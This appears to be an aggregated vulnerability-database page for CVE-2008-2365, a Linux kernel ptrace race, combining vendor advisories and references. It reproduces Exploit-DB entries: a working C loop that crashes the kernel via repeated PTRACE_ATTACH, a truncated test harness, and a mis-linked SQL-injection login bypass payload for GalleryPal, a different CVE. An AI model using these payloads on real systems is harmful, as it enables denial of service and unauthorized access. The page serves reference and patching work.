CVE-2008-2365
Published 2008-06-30
Priority P4 · 16 · medium · 4.7 (CVSS 2.0)
AV:L/AC:M/Au:N/C:N/I:N/A:C
EXPLOIT
EPSS 0.53% (40.5th percentile)
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
Affected
126 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fedoraproject | fedora_core | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvd · v2.0 · 4.7 MEDIUM · AV:L/AC:M/Au:N/C:N/I:N/A:C
vendor_ubuntu · 7.1 HIGH
vendor_redhat · 4.9 MEDIUM
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2008-07-15·CVSS 7.1
CVE-2008-2826 [HIGH] Linux kernel vulnerabilities
Dirk Nehring discovered that the IPsec protocol stack did not correctly handle fragmented ESP packets. A remote attacker could exploit this to crash the system, leading to a denial of service. (CVE-2007-6282)

Johannes Bauer discovered that the 64bit kernel did not correctly handle hrtimer updates. A local attacker could request a large expiration value and cause the system to hang, leading to a denial of service. (CVE-2007-6712)

Tavis Ormandy discovered that the ia32 emulation under 64bit kernels did not fully clear uninitialized data. A local attacker could read private kernel memory, leading to a loss of privacy. (CVE-2008-0598)

Jan Kratochvil discovered that PTRACE did not correctly handle certain calls when
Red Hat
kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
vendor_redhat·2008-04-02·CVSS 4.9
CVE-2008-2365 [MEDIUM] kernel: ptrace: Crash on PTRACE_{ATTACH,DETACH} race
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
Red Hat
crash - mmput()/unmap_vmas() - gdb testsuite
vendor_redhat·2006-09-18·CVSS 4.7
CVE-2008-2944 [MEDIUM] crash - mmput()/unmap_vmas() - gdb testsuite
Double free vulnerability in the utrace support in the Linux kernel, probably 2.6.18, in Red Hat Enterprise Linux (RHEL) 5 and Fedora Core 6 (FC6) allows local users to cause a denial of service (oops), as demonstrated by a crash when running the GNU GDB testsuite, a different vulnerability than CVE-2008-2365.
GHSA
GHSA-hqv4-9647-qxr5: Double free vulnerability in the utrace support in the Linux kernel, probably 2
ghsa_unreviewed·2022-05-01·CVSS 4.7
CVE-2008-2944 [MEDIUM] CWE-415 GHSA-hqv4-9647-qxr5: Double free vulnerability in the utrace support in the Linux kernel, probably 2
Double free vulnerability in the utrace support in the Linux kernel, probably 2.6.18, in Red Hat Enterprise Linux (RHEL) 5 and Fedora Core 6 (FC6) allows local users to cause a denial of service (oops), as demonstrated by a crash when running the GNU GDB testsuite, a different vulnerability than CVE-2008-2365.
GHSA
GHSA-rv47-5vwq-v454: Race condition in the ptrace and utrace support in the Linux kernel 2
ghsa_unreviewed·2022-05-01·CVSS 4.9
CVE-2008-2365 [MEDIUM] CWE-362 GHSA-rv47-5vwq-v454: Race condition in the ptrace and utrace support in the Linux kernel 2
Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to "late ptrace_may_attach() check" and "race around &dead_engine_ops setting," a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.
No detection rules found.
Exploit-DB
GalleryPal FE 1.5 - Authentication Bypass
exploitdb·2009-12-15
CVE-2009-2365 GalleryPal FE 1.5 - Authentication Bypass
---
[~] GalleryPal FE v1.5(Auth Bypass)
[~]TYPE:Remote SQL Injection Vulnerability
[~] ----------------------------------------------------------
[~] author: R3d-D3v!L
[~]
[~] Date: 15.11.2008
[~]
[~] Home: www.ahacker.net
[~]
[~] contact: N/A
[~]
[~] -----------------------------------------------------------
ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L
[~] Exploit:
[*] username : admin
[*] password : X' or ' 1=1--
[*] demo:
[*] server/GalleryPal_FE_Demo/login.asp
[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}
[~]
[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07
[~]
[~] www.xp10.me
[~]
[~]I4M:4r48!4N-3XPLO!73r
Exploit-DB
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
exploitdb·2008-06-25
CVE-2008-2365 Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)
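```c
/* Headers required by the calls below. */
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ptrace.h>

/* Repeatedly issues PTRACE_ATTACH against the PID given in argv[1]. */
int main(int argc, char *argv[])
{
	pid_t pid = atoi(argv[1]);

	while (1)
		ptrace(PTRACE_ATTACH, pid, NULL, NULL);
	return 0;
}
```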
Exploit-DB
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)
exploitdb·2008-06-25
CVE-2008-2365 Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)
```c
#ifdef __ia64__
#undef ia64_fpreg
#undef pt_all_user_regs
#endif /* __ia64__ */
#include
#include
#include
#if defined __i386__ || defined __x86_64__
#include
#endif
#include
#include
#include
#include
#include
#include

/* WARNING: The real testing count is probably unbound. */
#define DEFAULT_TESTTIME 10 /* seconds */

static pid_t pid;

static void
cleanup (void)
{
	if (pid != 0)
		kill (pid, SIGKILL);
}

static void
handler_fail (int signo)
{
	cleanup ();
	signal (signo, SIG_DFL);
	raise (signo);
}

static void *thread_func(void *argv0_pointer)
{
	execl("/proc/self/exe", argv0_pointer, "child", NULL);
	abort ();
	/* NOTREACHED */
}

int main(int argc, const char *argv[])
{
	char *testtime = getenv ("TESTTIME");
	time_t testend = time (NULL) + (testtime != NULL ? atoi
	(testtim
```
References
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=5ecfbae093f0c37311e89b29bfc0c9d586eace87
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=f358166a9405e4f1d8e50d8f415c26d95505b6de
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.25.y.git%3Ba=commit%3Bh=f5b40e363ad6041a96e3da32281d8faa191597b9
http://marc.info/?l=linux-kernel&m=117863520707703&w=2
http://rhn.redhat.com/errata/RHSA-2008-0508.html
http://secunia.com/advisories/30850
http://secunia.com/advisories/31107
http://securityreason.com/securityalert/3965
http://sources.redhat.com/cgi-bin/cvsweb.cgi/~checkout~/tests/ptrace-tests/tests/late-ptrace-may-attach-check.c?cvsroot=systemtap
http://www.openwall.com/lists/oss-security/2008/06/26/1
http://www.openwall.com/lists/oss-security/2008/07/14/1
http://www.securityfocus.com/bid/29945
http://www.securitytracker.com/id?1020362
http://www.ubuntu.com/usn/usn-625-1
https://bugzilla.redhat.com/show_bug.cgi?id=449359
https://exchange.xforce.ibmcloud.com/vulnerabilities/43567
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10749